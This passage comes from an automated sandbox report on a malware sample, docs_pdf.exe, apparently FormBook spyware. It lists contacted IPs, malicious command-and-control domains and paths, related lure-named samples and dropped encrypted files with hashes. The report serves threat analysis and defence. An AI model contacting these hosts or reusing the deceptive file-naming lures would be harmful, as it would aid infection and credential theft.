                              • Avira URL Cloud: safe
                              		unknown
                              https://ac.ecosia.org/autocomplete?q=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://static.loopia.se/responsive/images/iOS-57.pngclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/pics/29590/bg1.png)clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/Dream_Job_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Btclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/js/min.js?v2.3clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/Discussion_Forums.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2clip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebclip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=nsclip.exe, 00000003.00000002.2916160322.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.000000000349C000.00000004.00000001.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              194.9.94.85
                              		www.xn--matfrmn-jxa4m.seSweden
                              		39570LOOPIASEtrue
                              5.44.111.162
                              		www.hprlz.czGermany
                              		45031PROVIDERBOXIPv4IPv6DUS1DEfalse
                              217.160.0.106
                              		www.catherineviskadi.comGermany
                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                              208.91.197.27
                              		www.bfiworkerscomp.comVirgin Islands (BRITISH)
                              		40034CONFLUENCE-NETWORK-INCVGtrue
                              43.252.167.188
                              		www.xn--fhq1c541j0zr.comHong Kong
                              		38277CLINK-AS-APCommuniLinkInternetLimitedHKtrue

                              General Information

                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1472520
                              Start date and time:2024-07-13 00:06:10 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 15s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:docs_pdf.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/5@9/5
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 58
                              • Number of non-executed functions: 268
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target qsWkdNJOHuxNQUCXoUm.exe, PID 5788 because it is empty
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: docs_pdf.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              18:07:53API Interceptor3677328x Sleep call for process: clip.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              194.9.94.85TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                              • www.xn--matfrmn-jxa4m.se/4hda/
                              Attendance list.exeGet hashmaliciousFormBookBrowse
                              • www.xn--matfrmn-jxa4m.se/4hda/
                              Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                              • www.xn--matfrmn-jxa4m.se/5m4b/
                              Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                              • www.torentreprenad.com/r45o/
                              Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                              • www.torentreprenad.com/r45o/
                              TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                              • www.torentreprenad.com/r45o/
                              ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                              • www.torentreprenad.com/r45o/
                              D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                              • www.xn--matfrmn-jxa4m.se/ufuh/
                              Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                              • www.xn--matfrmn-jxa4m.se/ufuh/
                              Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                              • www.torentreprenad.com/r45o/
                              5.44.111.162TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                Attendance list.exeGet hashmaliciousFormBookBrowse
                                  217.160.0.106TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • www.catherineviskadi.com/qe66/
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • www.catherineviskadi.com/qe66/
                                  7cQuHxOrXh.exeGet hashmaliciousFormBookBrowse
                                  • www.terra-kapitalverwaltung.com/7bun/?lD=Dzsf9gxMzVcvGIFtv1zB+zNDsuRm/B8MqjmeJjDZObJZKKS92slBOYXNZcr4WOQLhaYS&8p=WFQ8pNmXe
                                  SUNEJ PAYMENT.exeGet hashmaliciousFormBookBrowse
                                  • www.stellantis-luxury-rent.com/m8ec/?DzrLW=VDKPcpdPnjE8Qb&ETRTzvU=lcRCED8mwam0j8rsNaeftt771GynQIE0hliVmee3NCJmmxoaoA4WDFL7Jc4nyizrq2kx
                                  208.91.197.27TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • www.bfiworkerscomp.com/xzzi/
                                  Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                  • www.thesprinklesontop.com/n12h/
                                  Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exeGet hashmaliciousFormBookBrowse
                                  • www.thesprinklesontop.com/n12h/
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • www.bfiworkerscomp.com/xzzi/
                                  Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                  • www.thesprinklesontop.com/n12h/
                                  Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                  • www.thesprinklesontop.com/n12h/
                                  KALIANDRA SETYATAMA PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                  • www.thesprinklesontop.com/n12h/
                                  Swift Copy #U00a362,271.03.Pdf.exeGet hashmaliciousFormBookBrowse
                                  • www.findyourwalden.online/w923/
                                  PO-104678522.exeGet hashmaliciousFormBookBrowse
                                  • www.findyourwalden.online/w923/
                                  NEW ORDER-RFQ#10112023Q4.exeGet hashmaliciousFormBookBrowse
                                  • www.findyourwalden.online/w923/

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  www.bfiworkerscomp.comTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.27
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.27
                                  www.anuts.topTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  2OdHcYtYOMOepjD.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  Tekstlinie.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.251.54.212
                                  Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  dMY6QiHAIpPPqiV.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  Purchase order.pdf.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  UNIVERSITY OF_ SHARJAH- Project FMD20240342_pdf.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  33BMmt58Bj.exeGet hashmaliciousFormBookBrowse
                                  • 23.251.54.212
                                  Payment_Advice.pdf.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.251.54.212
                                  www.xn--fhq1c541j0zr.comTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 43.252.167.188
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 43.252.167.188
                                  Lowe_list0605002024.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 43.252.167.188
                                  www.xn--matfrmn-jxa4m.seTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Scan Doc.docx.docGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  BASF Purchase Order.docGet hashmaliciousFormBookBrowse
                                  • 194.9.94.86
                                  SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  product Inquiry and RFQ ART LTD.docGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  New Order.docGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  GXu0Ow8T1h.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  www.hprlz.czTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 5.44.111.162
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 5.44.111.162
                                  www.catherineviskadi.comTOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 217.160.0.106
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 217.160.0.106

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  PROVIDERBOXIPv4IPv6DUS1DETOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 5.44.111.162
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 5.44.111.162
                                  62c.jsGet hashmaliciousUnknownBrowse
                                  • 5.44.111.28
                                  62c.jsGet hashmaliciousUnknownBrowse
                                  • 5.44.111.28
                                  z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                  • 5.44.111.104
                                  JJUmnnkIxSCyKik.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                  • 93.90.186.43
                                  De0RycaUHH.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, StealcBrowse
                                  • 5.44.111.109
                                  27i42a6Qag.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoaderBrowse
                                  • 128.127.69.76
                                  Wp2jiU6tOK.elfGet hashmaliciousMiraiBrowse
                                  • 5.44.126.213
                                  tSPx13a2fq.elfGet hashmaliciousMirai, MoobotBrowse
                                  • 5.44.126.228
                                  ONEANDONE-ASBrauerstrasse48DEIMG_00110724.exeGet hashmaliciousFormBookBrowse
                                  • 217.160.230.215
                                  SecuriteInfo.com.Trojan.AutoIt.1410.27475.23700.exeGet hashmaliciousFormBookBrowse
                                  • 212.227.172.254
                                  SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                  • 217.160.0.130
                                  SecuriteInfo.com.Win32.Malware-gen.27540.30253.exeGet hashmaliciousUnknownBrowse
                                  • 217.160.0.130
                                  http://mon-intranet.fr/Get hashmaliciousUnknownBrowse
                                  • 217.160.0.161
                                  https://gfaal.com/Get hashmaliciousUnknownBrowse
                                  • 74.208.236.213
                                  https://booking.inn-5781.eu/confirm/login/wzpCayeUGet hashmaliciousUnknownBrowse
                                  • 212.227.67.33
                                  SecuriteInfo.com.Win32.PWSX-gen.17883.22231.exeGet hashmaliciousFormBookBrowse
                                  • 217.160.230.215
                                  https://hotel-id637438.eu/sign-inGet hashmaliciousUnknownBrowse
                                  • 212.227.67.33
                                  DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                                  • 217.160.0.42
                                  CONFLUENCE-NETWORK-INCVGhttps://www.searchvity.comGet hashmaliciousUnknownBrowse
                                  • 208.91.196.46
                                  http://74.220.199.9Get hashmaliciousPhisherBrowse
                                  • 208.91.196.253
                                  http://www.welcome2oklahoma.com/Welcome2Oklahoma/Oklahoma%20Towns/Chandler/El%20Indio%20Mexican%20Restaurant/El%20Indio%20Mexican%20Restaurant.htm/Get hashmaliciousUnknownBrowse
                                  • 208.91.196.253
                                  PRE-ALERT HTHC22031529.exeGet hashmaliciousFormBookBrowse
                                  • 204.11.56.48
                                  http://le100.netGet hashmaliciousUnknownBrowse
                                  • 208.91.196.253
                                  Order 81307529516.LZ.exeGet hashmaliciousFormBookBrowse
                                  • 204.11.56.48
                                  TOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.27
                                  Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.13
                                  spec 4008670601 AZTEK Order.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.13
                                  Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeGet hashmaliciousFormBookBrowse
                                  • 208.91.197.27
                                  LOOPIASETOgpmvvWoj.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Attendance list.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Navana Pharmaceuticals PLC.pdf.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.86
                                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  Arrival Notice.bat.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  ORDER TKHA-A88163341B.bat.exeGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85
                                  c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exeGet hashmaliciousSystemBCBrowse
                                  • 93.188.3.13
                                  D7KV2Z73zC.rtfGet hashmaliciousFormBookBrowse
                                  • 194.9.94.85

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\23802I71

                                  Download File
                                  Process:C:\Windows\SysWOW64\clip.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                  Category:dropped
                                  Size (bytes):114688
                                  Entropy (8bit):0.9746603542602881
                                  Encrypted:false
                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Temp\Hezron

                                  Download File
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270848
                                  Entropy (8bit):7.994909580334422
                                  Encrypted:true
                                  SSDEEP:6144:Pxb/88Gf9W9tZutJQJa1/Ha5fnW8OKvtOzK4/cEa9GCOsFWmLevw:x3Go9tZutaYxSfWtKCcE5COswmLb
                                  MD5:62135523FE6225338817A98FCAC04060
                                  SHA1:EE93072A25438379CE698053B1E47D101F87BF20
                                  SHA-256:2D9D8BE609E3CC293C3C66B745AAB918E43C5CF592B8BE0493CE3CD51AA78077
                                  SHA-512:E53F7ECB9D971EFA11384345965E8F00D8073530D5550E26B7B18F39FCB0ED577C809595265D865B4F5B6269FE477E76BEAB3A76EC234F1F621C0FF845A6EA19
                                  Malicious:false
                                  Reputation:low
                                  Preview:.....A9KW..Y...k.K@...a4I..ERFPGMX2WUKCJBBI7A9KWERFPGMX2W.KCJL].9A.B.d.G..l.Z>&k38-%;V,.(6+<)$g/=.% %c#,b.x..&8!7h]JG|2WUKCJB;H>..+0.o&7.p8U.O..x"..[..y2!.]...k5,..+!!.!^.WERFPGMXb.UK.KCBXnyYKWERFPGM.2UT@BABBY3A9KWERFPGmM2WU[CJBbM7A9.WEBFPGOX2QUKCJBBI1A9KWERFPgIX2UUKCJBBK7..KWURF@GMX2GUKSJBBI7A)KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERF~3( FWUK.EFBI'A9KGARF@GMX2WUKCJBBI7A.KW%RFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFP

                                  C:\Users\user\AppData\Local\Temp\aut89B4.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):270848
                                  Entropy (8bit):7.994909580334422
                                  Encrypted:true
                                  SSDEEP:6144:Pxb/88Gf9W9tZutJQJa1/Ha5fnW8OKvtOzK4/cEa9GCOsFWmLevw:x3Go9tZutaYxSfWtKCcE5COswmLb
                                  MD5:62135523FE6225338817A98FCAC04060
                                  SHA1:EE93072A25438379CE698053B1E47D101F87BF20
                                  SHA-256:2D9D8BE609E3CC293C3C66B745AAB918E43C5CF592B8BE0493CE3CD51AA78077
                                  SHA-512:E53F7ECB9D971EFA11384345965E8F00D8073530D5550E26B7B18F39FCB0ED577C809595265D865B4F5B6269FE477E76BEAB3A76EC234F1F621C0FF845A6EA19
                                  Malicious:false
                                  Reputation:low
                                  Preview:.....A9KW..Y...k.K@...a4I..ERFPGMX2WUKCJBBI7A9KWERFPGMX2W.KCJL].9A.B.d.G..l.Z>&k38-%;V,.(6+<)$g/=.% %c#,b.x..&8!7h]JG|2WUKCJB;H>..+0.o&7.p8U.O..x"..[..y2!.]...k5,..+!!.!^.WERFPGMXb.UK.KCBXnyYKWERFPGM.2UT@BABBY3A9KWERFPGmM2WU[CJBbM7A9.WEBFPGOX2QUKCJBBI1A9KWERFPgIX2UUKCJBBK7..KWURF@GMX2GUKSJBBI7A)KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERF~3( FWUK.EFBI'A9KGARF@GMX2WUKCJBBI7A.KW%RFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFPGMX2WUKCJBBI7A9KWERFP

                                  C:\Users\user\AppData\Local\Temp\aut89F4.tmp

                                  Download File
                                  Process:C:\Users\user\Desktop\docs_pdf.exe
                                  File Type:data
                                  Category:dropped
